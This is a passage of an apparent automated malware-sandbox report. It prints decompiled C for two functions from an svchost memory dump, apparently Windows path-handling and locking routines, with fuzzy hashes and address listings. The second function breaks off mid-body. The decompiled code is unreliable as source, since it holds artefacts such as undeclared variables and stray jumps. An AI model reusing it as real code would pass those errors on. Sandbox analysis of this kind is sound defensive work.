                                          • Instruction Fuzzy Hash: 0B423975D002298FDB24CFA8C980BA9F7B1FF49304F1981AEE94DAB252D7359985CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A44120 Relevance: .4, Instructions: 444COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E03A44120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x3b1d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E03A5F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03A46E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03A44620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03A46E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M03A445F8))) {
												case 0:
													_v568 = 0x3a01078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x3a011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03A44620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E03A6F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E03A6F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E03A252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E03A3EB70(1, 0x3b179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E03A3AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E03A695D0();
																			L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E03A6B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03A63D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E03A6B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                          0x03a44128
                                          0x03a44135
                                          0x03a4413c
                                          0x03a44141
                                          0x03a44145
                                          0x03a44147
                                          0x03a4414e
                                          0x03a44151
                                          0x03a44159
                                          0x03a4415c
                                          0x03a44160
                                          0x03a44164
                                          0x03a44168
                                          0x03a4416c
                                          0x03a4417f
                                          0x03a44181
                                          0x03a4446a
                                          0x03a4446a
                                          0x03a4418c
                                          0x03a44195
                                          0x03a44199
                                          0x03a44432
                                          0x03a44439
                                          0x03a4443d
                                          0x03a44442
                                          0x03a44447
                                          0x00000000
                                          0x03a4419f
                                          0x03a441a3
                                          0x03a441b1
                                          0x03a441b9
                                          0x03a441bd
                                          0x03a445db
                                          0x03a445db
                                          0x00000000
                                          0x03a441c3
                                          0x03a441c3
                                          0x03a441ce
                                          0x03a441d4
                                          0x03a8e138
                                          0x03a8e13e
                                          0x03a8e169
                                          0x03a8e16d
                                          0x03a8e19e
                                          0x03a8e16f
                                          0x03a8e16f
                                          0x03a8e175
                                          0x03a8e179
                                          0x03a8e18f
                                          0x03a8e193
                                          0x00000000
                                          0x03a8e199
                                          0x00000000
                                          0x03a8e199
                                          0x03a8e193
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a441da
                                          0x03a441da
                                          0x03a441df
                                          0x03a441e4
                                          0x03a441ec
                                          0x03a44203
                                          0x03a44207
                                          0x03a8e1fd
                                          0x03a44222
                                          0x03a44226
                                          0x03a8e1f3
                                          0x03a8e1f3
                                          0x03a4422c
                                          0x03a4422c
                                          0x03a44233
                                          0x03a8e1ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a44239
                                          0x03a44239
                                          0x03a44239
                                          0x03a44239
                                          0x03a44233
                                          0x03a44226
                                          0x03a441ee
                                          0x03a441ee
                                          0x03a441f4
                                          0x03a44575
                                          0x03a8e1b1
                                          0x03a8e1b1
                                          0x00000000
                                          0x03a4457b
                                          0x03a4457b
                                          0x03a44582
                                          0x03a8e1ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a44588
                                          0x03a44588
                                          0x03a4458c
                                          0x03a8e1c4
                                          0x03a8e1c4
                                          0x00000000
                                          0x03a44592
                                          0x03a44592
                                          0x03a44599
                                          0x03a8e1be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a4459f
                                          0x03a4459f
                                          0x03a445a3
                                          0x03a8e1d7
                                          0x03a8e1e4
                                          0x00000000
                                          0x03a445a9
                                          0x03a445a9
                                          0x03a445b0
                                          0x03a8e1d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a445b6
                                          0x03a445b6
                                          0x03a445b6
                                          0x00000000
                                          0x03a445b6
                                          0x03a445b0
                                          0x03a445a3
                                          0x03a44599
                                          0x03a4458c
                                          0x03a44582
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a441f4
                                          0x03a4423e
                                          0x03a44241
                                          0x03a445c0
                                          0x03a445c4
                                          0x00000000
                                          0x03a445ca
                                          0x03a445ca
                                          0x00000000
                                          0x03a8e207
                                          0x03a8e20f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a445d1
                                          0x00000000
                                          0x00000000
                                          0x03a445ca
                                          0x00000000
                                          0x03a44247
                                          0x03a44247
                                          0x03a44247
                                          0x03a44249
                                          0x03a44249
                                          0x03a44249
                                          0x03a44251
                                          0x03a44251
                                          0x03a44257
                                          0x03a4425f
                                          0x03a4426e
                                          0x03a44270
                                          0x03a4427a
                                          0x03a8e219
                                          0x03a8e219
                                          0x03a44280
                                          0x03a44282
                                          0x03a44456
                                          0x03a445ea
                                          0x00000000
                                          0x03a445f0
                                          0x03a8e223
                                          0x00000000
                                          0x03a8e223
                                          0x03a4445c
                                          0x03a4445c
                                          0x00000000
                                          0x03a4445c
                                          0x00000000
                                          0x03a44288
                                          0x03a4428c
                                          0x03a8e298
                                          0x03a44292
                                          0x03a44292
                                          0x03a4429e
                                          0x03a442a3
                                          0x03a442a7
                                          0x03a442ac
                                          0x03a8e22d
                                          0x03a442b2
                                          0x03a442b2
                                          0x03a442b9
                                          0x03a442bc
                                          0x03a442c2
                                          0x03a442ca
                                          0x03a442cd
                                          0x03a442cd
                                          0x03a442d4
                                          0x03a4433f
                                          0x03a4433f
                                          0x03a442d6
                                          0x03a442d6
                                          0x03a442d9
                                          0x03a442dd
                                          0x03a442eb
                                          0x03a8e23a
                                          0x03a442f1
                                          0x03a44305
                                          0x03a4430d
                                          0x03a44315
                                          0x03a44318
                                          0x03a4431f
                                          0x03a44322
                                          0x03a4432e
                                          0x03a4433b
                                          0x03a4433b
                                          0x00000000
                                          0x03a4432e
                                          0x03a442eb
                                          0x03a4434c
                                          0x03a4434e
                                          0x03a44352
                                          0x03a44359
                                          0x03a4435e
                                          0x03a44361
                                          0x03a4436e
                                          0x03a4438a
                                          0x03a4438e
                                          0x03a44396
                                          0x03a4439e
                                          0x03a443a1
                                          0x03a443ad
                                          0x03a443bb
                                          0x03a443bb
                                          0x03a443ad
                                          0x03a4436e
                                          0x03a443bf
                                          0x03a443c5
                                          0x03a44463
                                          0x03a44463
                                          0x03a443ce
                                          0x03a443d5
                                          0x03a443d9
                                          0x03a443df
                                          0x03a44475
                                          0x03a44479
                                          0x03a44491
                                          0x03a44491
                                          0x03a44479
                                          0x03a443e5
                                          0x03a443eb
                                          0x03a443f4
                                          0x03a443f6
                                          0x03a443f9
                                          0x03a443fc
                                          0x03a443ff
                                          0x03a444e8
                                          0x03a444ed
                                          0x03a444f3
                                          0x03a8e247
                                          0x00000000
                                          0x03a444f9
                                          0x03a44504
                                          0x03a44508
                                          0x03a4450f
                                          0x03a8e269
                                          0x00000000
                                          0x03a44515
                                          0x03a44519
                                          0x03a44531
                                          0x03a44534
                                          0x03a44537
                                          0x03a4453e
                                          0x03a44541
                                          0x03a4454a
                                          0x03a8e255
                                          0x03a8e255
                                          0x03a8e25b
                                          0x03a8e25e
                                          0x03a8e261
                                          0x03a8e261
                                          0x03a44555
                                          0x03a44559
                                          0x03a4455d
                                          0x03a8e26d
                                          0x03a8e270
                                          0x03a8e274
                                          0x03a8e27a
                                          0x03a8e27d
                                          0x03a8e28e
                                          0x03a8e28e
                                          0x03a44563
                                          0x03a44563
                                          0x03a44569
                                          0x03a44569
                                          0x00000000
                                          0x03a4455d
                                          0x03a4450f
                                          0x00000000
                                          0x03a444f3
                                          0x03a443ff
                                          0x03a44405
                                          0x03a44405
                                          0x03a44405
                                          0x03a442ac
                                          0x03a4428c
                                          0x03a44282
                                          0x03a44407
                                          0x03a4440d
                                          0x03a8e2af
                                          0x03a8e2af
                                          0x03a44413
                                          0x03a44413
                                          0x00000000
                                          0x03a441d4
                                          0x00000000
                                          0x03a441c3
                                          0x03a441bd
                                          0x03a44415
                                          0x03a44415
                                          0x03a44416
                                          0x03a44417
                                          0x03a44429
                                          0x03a4416e
                                          0x03a4416e
                                          0x03a44175
                                          0x03a44498
                                          0x03a4449f
                                          0x03a8e12d
                                          0x00000000
                                          0x03a8e133
                                          0x00000000
                                          0x03a8e133
                                          0x03a444a5
                                          0x03a444a5
                                          0x03a444aa
                                          0x00000000
                                          0x03a444bb
                                          0x03a444ca
                                          0x03a444d6
                                          0x03a444d7
                                          0x03a444d8
                                          0x03a444e3
                                          0x03a444e3
                                          0x03a444aa
                                          0x03a4417b
                                          0x03a4417b
                                          0x03a4417b
                                          0x00000000
                                          0x03a4417b
                                          0x03a44175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad99d7cf8c44aa6b3d40f73bca122cf50c33c4e364333df0266ed1e388f93748
                                          • Instruction ID: 7ff6fccebcd9651ba72272ad4c722d805a0813f458946943bff0d4041db2e8f6
                                          • Opcode Fuzzy Hash: ad99d7cf8c44aa6b3d40f73bca122cf50c33c4e364333df0266ed1e388f93748
                                          • Instruction Fuzzy Hash: D5F15A74608251CBCB28DF1AC480B3AB7E5AF99714F58496FF8868B290E734D895CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A520A0 Relevance: .4, Instructions: 420COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E03A520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3b18714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03A52EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03A52EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E03A258EC(_t240);
									_t221 =  *0x3b15cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3b15cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03A64A2C(0x3b16e40, 0x3a64b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03A47D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3a05c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E03A5F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E03A5F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03AA7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03A42400(_t267 + 0x20);
															}
															L03A42400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03A52397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03A42280(_t134, 0x3b18608);
									__eflags =  *0x3b16e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E03A3FFB0(_t198, _t241, 0x3b18608);
										__eflags = _t253;
										if(_t253 != 0) {
											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3b16e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3b18608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03A56B90(_t210,  &_v64);
										_t262 =  *0x3b18608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E03A5E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E03A697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E03A6006A(0x3b18608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
